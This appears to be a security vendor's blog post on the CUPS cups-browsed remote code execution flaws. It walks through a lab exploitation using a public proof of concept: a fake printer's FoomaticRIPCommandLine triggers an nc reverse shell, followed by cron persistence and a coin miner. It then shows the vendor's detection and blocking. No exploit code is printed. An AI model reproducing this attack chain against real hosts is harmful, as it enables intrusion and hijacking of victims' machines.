Skip to content

A series of critical severity bugs in the CUPS printers discovery mechanism (cups-browsed) affecting Linux hosts was recently disclosed. The vulnerabilities can be leveraged to automatically install a malicious printer and perform unauthenticated remote code execution attacks. The details about the vulnerabilities as well as exploit code is already available in the public domain. Uptycs released details about the vulnerabilities here.

In this blog we want to showcase how Uptycs detects and remediates exploitation attempts on a vulnerable machine.

CUPS Exploitation

For the purpose of exploitation, we used this poc.

From the attacker machine, we run the exploit script to advertise our malicious printer with the name “BestPrinter” which would execute the nc command for reverse shell execution as shown in the image below.

Fig 1. Running the exploit scriptFig 1. Running the exploit script

The above command creates a multicast DNS query packet for advertising the malicious printer.

In the victim machine, when we try to print a page from Firefox, the malicious printer appears in the printer list. 

Fig-Fig 2. Malicious printer appears in victim machineFig 2. Malicious printer appears in victim machine

In the background, an IPP (Internet Printing Protocol) request packet is generated by the victim host to get more attributes about the printer. The exploit script responds by sending a crafted IPP Response with the exploit command present in the “FoomaticRIPCommandLine” field. This essentially tells the CUPS system to execute the foomatic-rip filter binary when a print job is sent to this printer. A malicious temporary PPD (PostScript Printer Description) file for a printer is generated.

Fig-3

Fig 3. IPP request and response containing exploit command

Victim has to manually click on the “Print” button to trigger the exploitation. 
The exploit runs successfully to trigger a reverse shell. We execute further commands to get system information, set cron jobs and further deploy CoinMiner.

Fig 4. Reverse shell connection is establishedFig 4. Reverse shell connection is established

Fig 5. Post exploitation activitiesFig 5. Post exploitation activities

 Vulnerability Detection

Uptycs automatically scans the entire infrastructure, hosts, containers, images and Lambda functions for impact and surfaces that on a dashboard.

Fig 6. Trending Vulnerabilities

Fig 6. Trending Vulnerabilities

You could get a detailed vulnerability report by double clicking into the vulnerability.

Fig-7Fig 7. Vulnerability Scan Report for CUPS CVEs.

Fig 7. Vulnerability Scan Report for CUPS CVEs.

Vulnerabilities are prioritized by evaluating the environment in which the vulnerability is found. Information such as internet exposure, a process from a vulnerable package id currently running and the process is running in a privileged mode. Mere presence of a package is lower priority than if a process from the vulnerable package is running and if it is running as a privileged user. If the asset is exposed to the internet (receiving inbound connection from public IP addresses) the priority is further increased.

Fig 8. Vulnerable process and package detailsFig 8. Vulnerable process and package details

Uptycs does not stop at just detecting the vulnerability. Our customers' infrastructure is protected from attackers leveraging the vulnerability to commit malicious activity.

Alerts Triggered in Uptycs 

Uptycs detects exploitation activities and protects users from getting attacked. Uptycs in a protect mode blocks the exploitation activity at the initial stage by killing the malicious process launched by the attacker thereby stopping the attacker from compromising the target machine. In a detect mode the exploitation is not blocked but all of the activity of the attacker is alerted and deep telemetry is collected for investigators to conduct forensic activity.

Exploitation in Protect Mode

When Uptycs is configured in Protect mode, the attack is stopped when the reverse shell is executed by the exploit script. 

Fig 9. Attack is blocked in Protect modeFig 9. Attack is blocked in Protect mode

Fig 10. Detection view in Protect modeFig 10. Detection view in Protect mode

Exploitation in Detect Mode

When we performed the attack in Detect mode, we see the full attack chain where the foomatic-rip process, whose parent is cupsd process, launches bash to execute reverse shell and coinminer attacks.  

Fig 11. Detection view in Detect modeFig 11. Detection view in Detect mode

Connect with our Team

The Uptycs team is ready to help. If you would like to learn more about the Uptycs Platform, speak to one of our experts, and see a demo of how to investigate and remediate issues like this one contact us today